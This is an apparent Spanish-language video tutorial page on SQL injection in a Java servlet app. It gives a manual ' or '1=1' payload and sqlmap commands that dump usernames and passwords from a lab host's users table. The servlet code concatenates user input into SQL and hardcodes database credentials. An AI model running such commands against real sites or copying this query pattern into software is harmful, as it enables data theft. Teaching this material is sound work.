Java Web desde cero en Netbeans ☁️[22.- Que es SQL Inyección? y como usar sqlmap]
En este tutorial vamos a aprender a menejar SQL Inyección? en nuestras consultas de mysql y ademas usaremos sqlmap para hacer inyecciones mas avanzadas para poder sacar mas información que de forma manual.
Injeccion de codigo sql de forma manual:
SELECT * FROM productos where existencia=’39’;
SELECT * FROM productos where existencia=’39’ or ‘1=1’;
Descubrir la BD
sqlmap -u http://192.168.8.103/cat.php?id=2 –dbs
Descubrir las Tablas
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog –tables
Descubrir las Columnas
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users –columns
Obtener los datos
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users -C id,login,password –dump
Codigo: https://github.com/programadornovato/javaWeb/commit/73f68b671a5129a1319e79367f4d1ff0c1d74432
package Servelets; import java.io.IOException; import java.io.PrintWriter; import javax.servlet.ServletException; import javax.servlet.annotation.WebServlet; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.sql.*; import com.mysql.jdbc.Driver; /** * * @author eugenio */ @WebServlet(name = "Empleados", urlPatterns = {"/Empleados"}) public class Empleados extends HttpServlet { Connection con = null; Statement st = null; ResultSet rs = null; /** * Processes requests for both HTTP <code>GET</code> and <code>POST</code> * methods. * * @param request servlet request * @param response servlet response * @throws ServletException if a servlet-specific error occurs * @throws IOException if an I/O error occurs */ protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { try (PrintWriter out = response.getWriter()) { /* TODO output your page here. You may use following sample code. */ try { Class.forName("com.mysql.jdbc.Driver"); con = DriverManager.getConnection("jdbc:mysql://localhost/jsp?user=eugenio&password=123456"); st = con.createStatement(); String query="SELECT * FROM `empledos` "; String where=" where 1=1 "; String nombre=request.getParameter("nombre"); if(nombre!=null){ where=where+" and nombre='"+nombre+"' "; } query=query+where; rs = st.executeQuery(query); while (rs.next()) { out.print("<tr>" + "<th scope=\"row\">" + rs.getString(1) + "</th>" + "<td>" + rs.getString(2) + "</td>" + "<td>" + rs.getString(3) + "</td>" + "<td>" + rs.getString(4) + "</td>" + "<td>" + " <a href=\"editar.jsp?id=" + rs.getString(1) + "&nombre=" + rs.getString(2) + "&direccion=" + rs.getString(3) + "&telefono=" + rs.getString(4) + "\"><i class=\"fa fa-pencil\" aria-hidden=\"true\"></i></a>" + " <a href=\"borrar.jsp?id=" + rs.getString(1) + "\" class=\"ml-1\"><i class=\"fa fa-trash\" aria-hidden=\"true\"></i></a>" + "</td>" + "</tr>" ); } } catch (Exception e) { out.print("error mysql " + e); } } } // <editor-fold defaultstate="collapsed" desc="HttpServlet methods. Click on the + sign on the left to edit the code."> /** * Handles the HTTP <code>GET</code> method. * * @param request servlet request * @param response servlet response * @throws ServletException if a servlet-specific error occurs * @throws IOException if an I/O error occurs */ @Override protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { processRequest(request, response); } /** * Handles the HTTP <code>POST</code> method. * * @param request servlet request * @param response servlet response * @throws ServletException if a servlet-specific error occurs * @throws IOException if an I/O error occurs */ @Override protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { processRequest(request, response); } /** * Returns a short description of the servlet. * * @return a String containing servlet description */ @Override public String getServletInfo() { return "Short description"; }// </editor-fold> } <%@page contentType="text/html" pageEncoding="UTF-8"%> <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous"> <link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous"> <title>Lista de empleados</title> </head> <body> <% HttpSession sesion = request.getSession(); if (sesion.getAttribute("logueado") == null || sesion.getAttribute("logueado").equals("0")) { response.sendRedirect("login.jsp"); } %> <div class="container"> <nav class="navbar navbar-light bg-light"> <a class="navbar-brand">Programador novato</a> <form class="form-inline" action="logout.jsp"> <a href="datosUsuario.jsp"><i class="fa fa-user-circle" aria-hidden="true"></i> <%= sesion.getAttribute("user")%></a> <button class="btn btn-outline-danger my-2 my-sm-0 ml-2" type="submit">Log out</button> </form> </nav> <div class="row mt-2"> <div class="col-sm"> <form action="index.jsp" method="get"> <table class="table table-striped"> <thead> <tr> <th scope="col" class="text-center"></th> <th scope="col" class="text-center"> <input type="text" name="nombre" class="form-control" placeholder="Buscar por nombre"/> </th> <th scope="col" class="text-center"> <input type="submit" value="Buscar" name="buscar" class="form-control btn btn-primary" /> </th> <th></th> <th scope="col" > <a href="crear.jsp"><i class="fa fa-user-plus" aria-hidden="true"></i></a> </th> </tr> <tr> <th scope="col">ID</th> <th scope="col">Nombre</th> <th scope="col">Direccion</th> <th scope="col">Telefono</th> <th scope="col">Acciones</th> </tr> </thead> <tbody> <jsp:include page="Empleados"/> </tbody> </table> </form> </div> </div> </div> </body> </html>
Curso de Java de 0 a 100: https://www.youtube.com/playlist?list=PLCTD_CpMeEKTT-qEHGqZH3fkBgXH4GOTF
? Esta lista de reproducción: https://www.youtube.com/playlist?list=PLCTD_CpMeEKRAgcBmPee0Wjx5HsJ0nb0L
Codigos en gdrive: https://drive.google.com/file/d/10uLG9o2oDV-qB32G4kMIpzXgLCiUYaYz/view?usp=sharing
Gracias por apoyar este canal: https://www.patreon.com/programadornovato?fan_landing=true
? Facebook: https://facebook.com/ProgramadorNovatoOficial
? Twitter: https://twitter.com/programadornova
? Linkedin: https://www.linkedin.com/in/programadornovato/
? Instagram: https://www.instagram.com/programadornovato/